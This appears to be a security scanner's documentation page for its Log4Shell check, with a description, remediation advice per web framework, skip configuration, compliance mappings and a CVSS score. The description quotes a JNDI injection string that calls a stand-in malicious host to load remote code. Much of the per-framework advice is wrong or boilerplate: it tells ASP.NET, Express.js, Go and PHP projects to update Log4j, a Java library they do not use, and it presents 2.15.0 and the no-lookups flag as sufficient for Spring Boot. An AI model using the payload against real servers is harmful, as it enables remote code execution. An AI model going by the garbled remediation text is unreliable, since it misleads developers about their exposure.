Log4Shell¶

Description¶

Log4Shell is a vulnerability that allows attackers to execute arbitrary code by injecting untrusted data into log messages processed by the Log4j library. Example: logger.error('${jndi:ldap://malicious.com/a}'') could trigger the execution of code from a remote server.

Remediation¶

To prevent Log4Shell vulnerabilities, take the following actions:

Update Log4j to the latest version, where this vulnerability is patched.
Use input validation and sanitization to ensure that user inputs are not directly used in log messages.
Disable the jndi lookups in Log4j by setting the system property log4j2.formatMsgNoLookups to true.
Restrict outbound network access from the servers running your applications to prevent JNDI lookups from reaching untrusted servers.
Implement application-level security controls and monitor for unusual log patterns that may indicate attempted exploits.

REST Specific¶

Spring_boot

Update Log4j to version 2.15.0 or later to mitigate the Log4Shell vulnerability. Ensure that log messages do not include untrusted data without proper validation and sanitization. Disable `jndi` lookups by setting the `log4j2.formatMsgNoLookups` system property to `true`. Regularly review and monitor logs for suspicious activities.

Asp_net

Update to the latest version of Log4j and apply security patches

Django

Upgrade to the latest version of Django and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Express_js

Update to the latest version of Log4j and apply security patches

Fastapi

Upgrade to the latest version of FastAPI and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Flask

Update to the latest version of Flask and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Frappe

Update to the latest version of the Frappe framework to ensure all security patches are applied and review logging configurations to prevent injection vulnerabilities.

Genzio

Update to the latest version of the Genzio framework engine to patch known vulnerabilities.

Gin

Update to the latest version of the Gin framework to ensure all security patches are applied.

Gorilla

Update to the latest version of the Log4j library and apply security patches to mitigate the Log4Shell vulnerability.

Hapi

Update to the latest version of the hapi framework to ensure all security patches are applied.

Hono

Update to the latest version of the Hono framework engine to ensure all security patches are applied.

Jersey

Update to the latest version of the Jersey framework to ensure all security patches are applied.

Koa

Update to the latest version of the Koa framework and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Ktor

Update to the latest version of Ktor and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Laravel

Update to the latest version of Laravel and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Leptos

Update to the latest version of the Leptos framework to patch known vulnerabilities

Macaron

Update to the latest version of the Macaron framework to ensure all security patches are applied.

Next_js

Upgrade to the latest version of Next.js and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Nuxt

Update Log4j to version 2.17.1 or later and ensure all dependencies are also updated to mitigate the Log4Shell vulnerability in your Nuxt.js application.

Phoenix

Upgrade to the latest version of the Phoenix framework and Elixir to ensure all security patches are applied.

Ruby_on_rails

Update to the latest version of Rails and ensure all dependencies are up to date to mitigate known vulnerabilities.

Redwoodjs

Update to the latest version of RedwoodJS and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Rocket

Update to the latest version of the Rocket framework to ensure all security patches are applied.

Sveltekit

Update to the latest version of SvelteKit and ensure all dependencies are up-to-date to mitigate known vulnerabilities.

Symfony

Update to the latest version of the Log4j library and apply security patches provided by Symfony to mitigate the Log4Shell vulnerability.

Configuration¶

Identifier: injection/log4shel

Examples¶

Ignore this check¶

checks:
  injection/log4shel:
    skip: true

Score¶

Escape Severity:

Compliance¶

OWASP: API8:2023
pci: 6.5.10
gdpr: Article-32
soc2: CC6
psd2: Article-97
iso27001: A.14.2
nist: SP800-53
fedramp: SI-10

Classification¶

CWE: 829

Score¶

CVSS_VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
CVSS_SCORE: 9.8

References¶

https://cwe.mitre.org/data/definitions/829.html
- https://logging.apache.org/log4j/2.x/security.html